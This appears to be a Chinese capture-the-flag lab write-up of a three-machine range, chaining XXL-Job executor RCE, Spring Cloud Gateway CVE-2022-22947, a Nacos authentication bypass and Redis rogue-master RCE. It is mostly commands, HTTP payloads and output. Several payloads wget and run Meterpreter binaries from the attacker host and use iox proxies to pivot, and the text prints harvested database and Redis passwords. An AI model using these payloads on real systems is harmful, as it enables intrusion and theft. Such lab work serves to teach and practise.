标签
xxl-job rce
Spring-Cloud-CVE-2022-22947
nacos auth bypass
iox
靶机难度比较简单,都是用用 exp 就好了
拓扑图
网卡设置
首先需要使用虚拟网络编辑器,增加 VMnet1、VMnet2、VMnet3
对三张网卡设置子网 IP
VMnet1
192.168.100.0
VMnet2
192.168.88.0
VMnet3
10.30.7.106
如遇到不能启动虚拟机,将 靶机名字.vmx,如 xxl-job.vmx 文件第四行更改
更改 xxl-job 虚拟机网卡,将桥接改为 VMnet3
攻击机 kali 也需要将桥接改为 VMnet3
当靶机全都开起来以后,可以做个快照,这样出问题就可以直接恢复快照了
Recon
对目标 10.30.7.106 做端口扫描,结果如下
PORT STATE SERVICE
22/tcp open ssh
8080/tcp open http-proxy
8081/tcp open blackice-icecap
9999/tcp open abyss
其中,访问 8080、8081 端口显示 404,目录扫描无结果
当访问 9999 端口时候,显示 {"code":500,"msg":"invalid request, HttpMethod not support."}
扫描目录也没有结果
所以能看到的信息只有这样一句话{"code":500,"msg":"invalid request, HttpMethod not support."}
,搜索得到
xxl-job
漏洞利用
获取 meterpreter shell
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.30.7.128 LPORT=1234 --platform linux -f elf -o xxl
python 开启临时 http 服务用于传输木马
python3 -m http.server 80
开启监听
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
PAYLOAD => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST eth0
LHOST => eth0
msf6 exploit(multi/handler) > set LPORT 1234
LPORT => 1234
msf6 exploit(multi/handler) > run
使用 burp 发送下面的数据包
POST /run HTTP/1.1
Host: 10.30.7.106:9999
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 393
{
"jobId": 1,
"executorHandler": "demoJobHandler",
"executorParams": "demoJobHandler",
"executorBlockStrategy": "COVER_EARLY",
"executorTimeout": 0,
"logId": 1,
"logDateTime": 1586629003729,
"glueType": "GLUE_SHELL",
"glueSource": "wget 10.30.7.128/xxl -O /tmp/.xxl;chmod +x /tmp/.xxl;/tmp/.xxl",
"glueUpdatetime": 1586699003758,
"broadcastIndex": 0,
"broadcastTotal": 0
}
得到 shell,权限为 root
meterpreter > shell
Process 1572 created.
Channel 1 created.
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:c6:13:b0 brd ff:ff:ff:ff:ff:ff
inet 10.30.7.106/21 brd 10.30.7.255 scope global ens33
valid_lft forever preferred_lft forever
inet6 fe80::20c:29ff:fec6:13b0/64 scope link
valid_lft forever preferred_lft forever
3: ens37: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:c6:13:ba brd ff:ff:ff:ff:ff:ff
inet 192.168.100.20/24 brd 192.168.100.255 scope global ens37
valid_lft forever preferred_lft forever
inet6 fe80::20c:29ff:fec6:13ba/64 scope link
valid_lft forever preferred_lft forever
whoami
root
此处可以看到目标靶机为双网卡,还有另一个网段
接下来做 socks 代理,搜集内网存活主机
spring-cloud-geteway
横向移动
主机发现
for k in $( seq 1 255);do ping -c 1 192.168.100.$k|grep "ttl"|awk -F "[ :]+" '{print $4}'; done
得到
192.168.100.50
socks 代理
1、kali 使用 python 开启临时 http 服务
python3 -m http.server 80
2、kali 开启监听
./iox proxy -l 9991 -l 1080
3、将 iox 下载至入口机
wget 10.30.7.128/iox
chmod +x iox
./iox proxy -r 10.30.7.128:9991 &
完成 socks 代理搭建
对 100.50 使用 fscan 扫描
得到漏洞信息
proxychains4 ./fscan_amd64 -h 192.168.100.50 -socks5 127.0.0.1:1080
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
Socks5Proxy: socks5://127.0.0.1:1080
start infoscan
192.168.100.50:8848 open
192.168.100.50:8800 open
192.168.100.50:22 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle: http://192.168.100.50:8848 code:404 len:431 title:HTTP Status 404 – Not Found
[*] WebTitle: http://192.168.100.50:8800 code:503 len:292 title:None
[+] http://192.168.100.50:8848 poc-yaml-alibaba-nacos
[+] http://192.168.100.50:8848 poc-yaml-alibaba-nacos-v1-auth-bypass
[+] http://192.168.100.50:8800 Spring-Cloud-CVE-2022-22947
[+] http://192.168.100.50:8800 poc-yaml-spring-actuator-heapdump-file
[+] http://192.168.100.50:8800 poc-yaml-springboot-env-unauth spring2
已完成 3/3
[*] 扫描结束,耗时: 16.92195982s
漏洞利用 移动至 100.50
从扫描结果可以发现,100.50 只开放了 2 个端口,且两个端口都有漏洞
在 github 找到 Spring-Cloud-CVE-2022-22947 漏洞利用脚本
验证
proxychains4 python3 22947.py http://192.168.100.50:8800
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
___ _ __ _ __(_)_ __ __ _ ___| | ___ _ _ __| | ___ __ _
/ __| '_ \| '__| | '_ \ / _` |_____ / __| |/ _ \| | | |/ _` |_____/ __|/ _` |
\__ \ |_) | | | | | | | (_| |_____| (__| | (_) | |_| | (_| |_____\__ \ (_| |
|___/ .__/|_| |_|_| |_|\__, | \___|_|\___/ \__,_|\__,_| |___/\__, |
|_| |___/ |_|
_ ____ ____ _____
___| | _ \ / ___| ____|
/ _ \ | |_) | | | _|
| __/ | _ <| |___| |___
\___|_|_| \_\____|_____|
Usage: python3 CVE-2022-22947.py url
(If you want to get the reverse shell,please input: shell)
Please input your commond: id
---------------------------------------
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.50:8800 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.50:8800 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.50:8800 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.50:8800 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.50:8800 ... OK
The commond result is :
Result = 'uid=0(root) gid=0(root) groups=0(root)']
命令执行有回显
接下来获取 shell
Spring-Cloud-CVE-2022-22947 获取 meterpreter 会话
由于 100.50 和 3.x 网端是不通的,所以需要在入口机器 xxl-job 做端口转发,且生成的木马需要传输至 xxl-job
1、在 xxl-job 中使用 iox 开启端口转发
./iox fwd -l 2211 -r 10.30.7.128:1235 &
2、生成木马
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.100.20 LPORT=2211 --platform linux -f elf -o springcloud-re-2211
3、下载木马至入口机器 xxl-job
wget 10.30.7.128/springcloud-re-2211
--2023-01-11 06:35:13-- http://10.30.7.128/springcloud-re-2211
Connecting to 10.30.7.128:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 250 [application/octet-stream]
Saving to: 'springcloud-re-2211'
0K 100% 43.5M=0s
2023-01-11 06:35:13 (43.5 MB/s) - 'springcloud-re-2211' saved [250/250]
python3 -m http.server 1337
exit
meterpreter > bg
[*] Backgrounding session 1...
4、开启监听
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > set LPORT 1235
LPORT => 1235
msf6 exploit(multi/handler) > run
5、运行 exp
proxychains4 python3 22947.py http://192.168.100.50:8800
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
___ _ __ _ __(_)_ __ __ _ ___| | ___ _ _ __| | ___ __ _
/ __| '_ \| '__| | '_ \ / _` |_____ / __| |/ _ \| | | |/ _` |_____/ __|/ _` |
\__ \ |_) | | | | | | | (_| |_____| (__| | (_) | |_| | (_| |_____\__ \ (_| |
|___/ .__/|_| |_|_| |_|\__, | \___|_|\___/ \__,_|\__,_| |___/\__, |
|_| |___/ |_|
_ ____ ____ _____
___| | _ \ / ___| ____|
/ _ \ | |_) | | | _|
| __/ | _ <| |___| |___
\___|_|_| \_\____|_____|
Usage: python3 CVE-2022-22947.py url
(If you want to get the reverse shell,please input: shell)
Please input your commond: shell
---------------------------------------
Please input your commond for reverse shell , such as ("bash -i >& /dev/tcp/192.168.190.177/5000 0>&1"):
wget 192.168.100.20:1337/springcloud-re-2211 -O /tmp/.springcloud-re-2211;chmod +x /tmp/.springcloud-re-2211;/tmp/.springcloud-re-2211
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.50:8800 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.50:8800 ... OK
6、得到 springcloud 主机 shell
rumsf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.30.7.128:1235
[*] Sending stage (3045348 bytes) to 10.30.7.106
[*] Meterpreter session 2 opened (10.30.7.128:1235 -> 10.30.7.106:39446) at 2023-01-11 01:36:09 -0500
meterpreter > shell
Process 2199 created.
Channel 1 created.
whoami && ip a
root
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:8c:96:21 brd ff:ff:ff:ff:ff:ff
inet 192.168.100.50/24 brd 192.168.100.255 scope global ens33
valid_lft forever preferred_lft forever
inet6 fe80::20c:29ff:fe8c:9621/64 scope link
valid_lft forever preferred_lft forever
3: ens37: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:8c:96:2b brd ff:ff:ff:ff:ff:ff
inet 192.168.88.60/24 brd 192.168.88.255 scope global ens37
valid_lft forever preferred_lft forever
inet6 fe80::20c:29ff:fe8c:962b/64 scope link
valid_lft forever preferred_lft forever
8848 nacos 未授权
通过 fscan 的漏洞扫描结果,可以看到 8848 端口还开着一个网站,且有公开漏洞
利用步骤
1、使用 curl 发 POST 请求
proxychains4 curl -X POST http://192.168.100.50:8848/nacos/v1/auth/users\?username=test\&password=test
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.50:8848 ... OK
{"code":200,"message":"create user ok!","data":null}
2、通过网页登录,测试成功
在 admin-api、redis-task 中得到一些凭据
spring:
datasource:
druid:
url: jdbc:log4jdbc:mysql://127.0.0.1:3306/admin?serverTimezone=Asia/Shanghai&characterEncoding=utf8&useSSL=false
username: root
password: Pabc@234%!
redis:
host: 0.0.0.0
password: nbsg@123456
port: 6379
databases: 0,1,2,3,4,5,6,7
timeout: 60000
三层代理
对 100.50 的利用以及差不多了,接下来移动至 88.x 段
for k in $( seq 1 255);do ping -c 1 192.168.88.$k|grep "ttl"|awk -F "[ :]+" '{print $4}'; done
得到 192.168.88.70
socks 代理
# kali
./iox proxy -l 9992 -l 10801
# xxl-job
./iox fwd -l 9992 -r 10.30.7.128:9992
# springcloud
./iox proxy -r 192.168.100.20:9992
redis
proxychains4 python3 redis-rce.py -r 192.168.88.70 -L 10.30.7.128 -f module.so -a "nbsg@123456"
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
█▄▄▄▄ ▄███▄ ██▄ ▄█ ▄▄▄▄▄ █▄▄▄▄ ▄█▄ ▄███▄
█ ▄▀ █▀ ▀ █ █ ██ █ ▀▄ █ ▄▀ █▀ ▀▄ █▀ ▀
█▀▀▌ ██▄▄ █ █ ██ ▄ ▀▀▀▀▄ █▀▀▌ █ ▀ ██▄▄
█ █ █▄ ▄▀ █ █ ▐█ ▀▄▄▄▄▀ █ █ █▄ ▄▀ █▄ ▄▀
█ ▀███▀ ███▀ ▐ █ ▀███▀ ▀███▀
▀ ▀
[*] Connecting to 192.168.88.70:6379...
[proxychains] Strict chain ... 127.0.0.1:10801 ... 192.168.88.70:6379 ... OK
[*] Sending SLAVEOF command to server
[+] Accepted connection from 127.0.0.1:10801
[*] Setting filename
[+] Accepted connection from 127.0.0.1:10801
[*] Start listening on 10.30.7.128:21000
[*] Tring to run payload
[-] Error: timed out, exit
[*] Clean up..
由于网段不通,还需要做端口转发
# springcloudgeteway
./iox fwd -l 21000 -r 192.168.100.20:8882
# xxl-job
./iox fwd -l 8882 -r 10.30.7.128:21000
再次运行 redis-rce.py
proxychains4 python3 redis-rce.py -r 192.168.88.70 -L 192.168.88.60 -P 21000 -f module.so -a "nbsg@123456"
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
█▄▄▄▄ ▄███▄ ██▄ ▄█ ▄▄▄▄▄ █▄▄▄▄ ▄█▄ ▄███▄
█ ▄▀ █▀ ▀ █ █ ██ █ ▀▄ █ ▄▀ █▀ ▀▄ █▀ ▀
█▀▀▌ ██▄▄ █ █ ██ ▄ ▀▀▀▀▄ █▀▀▌ █ ▀ ██▄▄
█ █ █▄ ▄▀ █ █ ▐█ ▀▄▄▄▄▀ █ █ █▄ ▄▀ █▄ ▄▀
█ ▀███▀ ███▀ ▐ █ ▀███▀ ▀███▀
▀ ▀
[*] Connecting to 192.168.88.70:6379...
[proxychains] Strict chain ... 127.0.0.1:10801 ... 192.168.88.70:6379 ... OK
[*] Sending SLAVEOF command to server
[+] Accepted connection from 127.0.0.1:10801
[*] Setting filename
[+] Accepted connection from 127.0.0.1:10801
[*] Start listening on 192.168.88.60:21000
[*] Tring to run payload
[+] Accepted connection from 10.30.7.106:40740
[*] Closing rogue server...
[+] What do u want ? [i]nteractive shell or [r]everse shell or [e]xit: i
[+] Interactive shell open , use "exit" to exit...
$ cat /root/flag
flag{good_redis}
至此完成靶机渗透,得到三台机器 root